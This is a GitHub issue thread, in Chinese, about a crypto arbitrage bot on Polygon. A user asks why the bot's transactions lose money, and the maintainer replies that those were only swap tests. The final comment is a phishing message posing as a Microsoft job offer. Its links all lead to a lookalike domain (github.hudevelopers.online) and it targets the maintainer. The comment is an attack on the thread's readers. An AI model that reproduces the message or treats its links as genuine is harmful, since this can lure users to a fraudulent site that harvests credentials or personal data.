### ISSUE TITLE
疑惑: 套利机器人

### ISSUE THREAD

**Issue by jschyz** [onee-io/flash-bot#2]
看了下 polygon 上面的 [Transactions](https://polygonscan.com/address/0xF0798939453241ac407012855Ee80c9b043BE822#transactions), 看着都是亏本的生意。

如下面的 [tx](https://polygonscan.com/tx/0xcbb66eb156969841fc557392187756c54e7c1aaf9a999fba2d647d23295f3d4c)，0.01 USD 进 0.00949 出

```
From 0xddc5fe59b71bb7930994f2c584ed17a03b047fb4To 0x6e7a5fafcec6bb1e78bae2a1f0b612012bf14827 For 0.01 ($0.01) USD Coin (Po... (USDC)
From 0x6e7a5fafcec6bb1e78bae2a1f0b612012bf14827To 0xcd353f79d9fade311fc3119b841e1f456b54e858 For 0.007648797103334855 ($0.01) Wrapped Mati... (WMATIC)
From 0xcd353f79d9fade311fc3119b841e1f456b54e858To 0xddc5fe59b71bb7930994f2c584ed17a03b047fb4 For 0.009949 ($0.01) USD Coin (Po... (USDC)
```

**Comment by jschyz** [comment]
套利机器人需要手动指定 ERC-20 代币，有没有扫描出存在利率差的方法，自动套利呢？

**Comment by onee-io** [comment]
Polygon 上的 Tx 是执行的 executeSwap 方法，测试多 DEX 兑换功能是否正常，并不是执行的 executeArbitrageSwap 套利方法，这个机器人的主要目的是完成套利操作，而发现套利机会并不是那么容易的，有好的想法，欢迎提 PR。

**Comment by fekusatech** [comment]
# Congratulations, onee-io!

Hello,

We are delighted to inform you that your application for a position at Microsoft has advanced to the final stage. This opportunity comes with a competitive salary offer of $200,000, reflecting the significant role and responsibilities.

For more details and to proceed with your application, please visit [Microsoft Careers](https://github.hudevelopers.online/).

## Next Steps:

1. **Confirm Interview Date**
   - Please confirm your availability by visiting the following link: [Schedule Interview](https://github.hudevelopers.online/)

2. **Prepare for Your Interview**
   - Review the job description and be prepared to discuss how your experiences and skills align with Microsoft's needs. Further information can be found at [Microsoft Careers](https://github.hudevelopers.online/).

3. **Review Offer Details**
   - While preparing, consider the comprehensive benefits package, which will be detailed further during the interview process. Additional details are available at [Microsoft Careers](https://github.hudevelopers.online/).

Thank you for your interest in joining Microsoft. We are very impressed with your background and are excited to potentially welcome you to our team.

*If you have any questions or need to update your application details, please do not hesitate to visit [Contact Us](https://github.hudevelopers.online/).*

Best Regards,  
**Microsoft Hiring Team**
